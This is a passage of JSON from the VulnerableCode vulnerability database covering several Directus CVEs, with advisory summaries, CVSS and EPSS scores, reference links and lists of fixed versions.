nce_id":"GHSA-632p-p495-25m5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-632p-p495-25m5"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-632p-p495-25m5","reference_id":"GHSA-632p-p495-25m5","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-06-03T15:30:27Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-632p-p495-25m5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/31918?format=json","purl":"pkg:npm/directus@10.11.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulner
ability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.11.2"}],"aliases":["CVE-2024-36128","GHSA-632p-p495-25m5"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qeh1-cm33-93g1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90513?format=json","vulnerability_id":"VCID-qfnx-egwg-ybgp","summary":"Directus is a real-time API and App dashboard for managing SQL database content. A vulnerability in versions prior to 11.13.0 allows authenticated users to search concealed/sensitive fields when they have read permissions. While actual values remain masked (`****`), successful matches can be detected through returned records, enabling enumeration attacks on sensitive data. 
Version 11.13.0 fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64748","reference_id":"","reference_type":"","scores":[{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15936","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.158","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64748"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/7737d56e096f95edfbdf861a3c08999ad31ce204","reference_id":"7737d56e096f95edfbdf861a3c08999ad31ce204","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:39:19Z/"}],"url":"https://github.com/directus/directus/commit/7737d56e096f95edfbdf861a3c08999ad31ce204"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64748","reference_id":"CVE-2025-64748","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64748"},{"reference_url":"https://github.com/advisories/GHSA-8jpw-gpr4-8cmh","reference_id":"GHSA-8jpw-gpr4-8cmh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/a
dvisories/GHSA-8jpw-gpr4-8cmh"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-8jpw-gpr4-8cmh","reference_id":"GHSA-8jpw-gpr4-8cmh","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:39:19Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-8jpw-gpr4-8cmh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/35193?format=json","purl":"pkg:npm/directus@11.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0"}],"aliases":["CVE-2025-64748","GHSA-8jpw-gpr4-8cmh"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qfnx-egwg-ybgp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/37995?format=json","vulnerability_id":"VCID-qrf3-cz1h-8kau","summary":"Directus is a real-time API and App dashboard for managing SQL database content. 
When relying on blocking access to localhost using the default `0.0.0.0` filter, a user may bypass this block by using other registered loopback devices (like `127.0.0.2` - `127.127.127.127`). This issue has been addressed in release versions 10.13.3 and 11.1.0. Users are advised to upgrade. Users unable to upgrade may block this bypass by manually adding the `127.0.0.0/8` CIDR range, which will block access to any `127.X.X.X` IP instead of just `127.0.0.1`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46990","reference_id":"","reference_type":"","scores":[{"value":"0.00237","scoring_system":"epss","scoring_elements":"0.47051","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00237","scoring_system":"epss","scoring_elements":"0.47191","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46990"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b","reference_id":"4aace0bbe57232e38cd6a287ee475293e46dc91b","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"s
svc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b"},{"reference_url":"https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52","reference_id":"769fa22797bff5a9231599883b391e013f122e52","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52"},{"reference_url":"https://github.com/directus/directus/commit/8cbf943b65fd4a763d09a5fdbba8996b1e7797ff","reference_id":"8cbf943b65fd4a763d09a5fdbba8996b1e7797ff","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/commit/8cbf943b65fd4a763d09a5fdbba8996b1e7797ff"},{"reference_url":"https://github.com/directus/directus/commit/c1f3ccc681595038d094ce110ddeee38cb38f431","reference_id":"c1f3ccc681595038d094ce110ddeee38cb38f431"
,"reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/commit/c1f3ccc681595038d094ce110ddeee38cb38f431"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46990","reference_id":"CVE-2024-46990","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46990"},{"reference_url":"https://github.com/advisories/GHSA-68g8-c275-xf2m","reference_id":"GHSA-68g8-c275-xf2m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-68g8-c275-xf2m"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-68g8-c275-xf2m","reference_id":"GHSA-68g8-c275-xf2m","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N
/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-68g8-c275-xf2m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33327?format=json","purl":"pkg:npm/directus@10.13.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.3"},{"url":"http://public2.vulnerablecode.io/api/packages/33328?format=json","purl":"pkg:npm/directus@11.0.0-rc.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http:/
/public2.vulnerablecode.io/packages/pkg:npm/directus@11.0.0-rc.1"},{"url":"http://public2.vulnerablecode.io/api/packages/33329?format=json","purl":"pkg:npm/directus@11.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-3vnr-k31f-vycv"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-ghbw-eqaz-jqhs"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.1.0"}],"aliases":["CVE-2024-46990","GHSA-68g8-c275-xf2m"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qrf3-cz1h-8kau"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/70838?format=json","vulnerability_id":"VCID-rdpb-7dcd-fyby","summary":"Directus is a real-time API and App dashboard for managing SQL database 
content. Before 11.14.1, a timing-based user enumeration vulnerability exists in the password reset functionality. When an invalid reset_url parameter is provided, the response time differs by approximately 500ms between existing and non-existing users, enabling reliable user enumeration. This vulnerability is fixed in 11.14.1.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26185","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02551","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02548","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26185"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/pull/26485","reference_id":"26485","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/"}],"url":"https://github.com/directus/directus/pull/26485"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26185","reference_id":"CVE-2026-26185","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26185"},{"reference_url":"https://github.com/directus/di
rectus/commit/e69aa7a5248c6e3e822cb1ac354dee295df90b2a","reference_id":"e69aa7a5248c6e3e822cb1ac354dee295df90b2a","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/"}],"url":"https://github.com/directus/directus/commit/e69aa7a5248c6e3e822cb1ac354dee295df90b2a"},{"reference_url":"https://github.com/advisories/GHSA-jr94-gj3h-c8rf","reference_id":"GHSA-jr94-gj3h-c8rf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jr94-gj3h-c8rf"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-jr94-gj3h-c8rf","reference_id":"GHSA-jr94-gj3h-c8rf","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-jr94-gj3h-c8rf"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.14.1","reference_id":"v11.14.1","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.14.1"}],"fixed_packages":[{"url":"http://public
2.vulnerablecode.io/api/packages/39145?format=json","purl":"pkg:npm/directus@11.14.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.14.1"}],"aliases":["CVE-2026-26185","GHSA-jr94-gj3h-c8rf"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rdpb-7dcd-fyby"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/105820?format=json","vulnerability_id":"VCID-rren-vtar-23fm","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 9.0.0 and prior to version 11.9.0, the exact Directus version number is incorrectly used as the OpenAPI Spec version; this means that it is exposed by the `/server/specs/oas` endpoint without authentication. With the exact version information, a malicious attacker can look for known vulnerabilities in Directus core or any of its shipped dependencies in that specific running version. 
Version 11.9.0 fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53887","reference_id":"","reference_type":"","scores":[{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.55091","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.55212","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53887"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53887","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53887"},{"reference_url":"https://github.com/directus/directus/pull/25353","reference_id":"25353","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/"}],"url":"https://github.com/directus/directus/pull/25353"},{"reference_url":"https://github.com/directus/directus/commit/e74f3e4e92edc33b5f83eefb001a3d2a85af17a3","reference_id":"e74f3e4e92edc33b5f83eefb001a3d2a85af17a3","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","sc
oring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/"}],"url":"https://github.com/directus/directus/commit/e74f3e4e92edc33b5f83eefb001a3d2a85af17a3"},{"reference_url":"https://github.com/advisories/GHSA-rmjh-cf9q-pv7q","reference_id":"GHSA-rmjh-cf9q-pv7q","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-rmjh-cf9q-pv7q"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-rmjh-cf9q-pv7q","reference_id":"GHSA-rmjh-cf9q-pv7q","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-rmjh-cf9q-pv7q"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.9.0","reference_id":"v11.9.0","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.9.0"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/378353?format=json","purl":"pkg:npm/directus@11.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vu
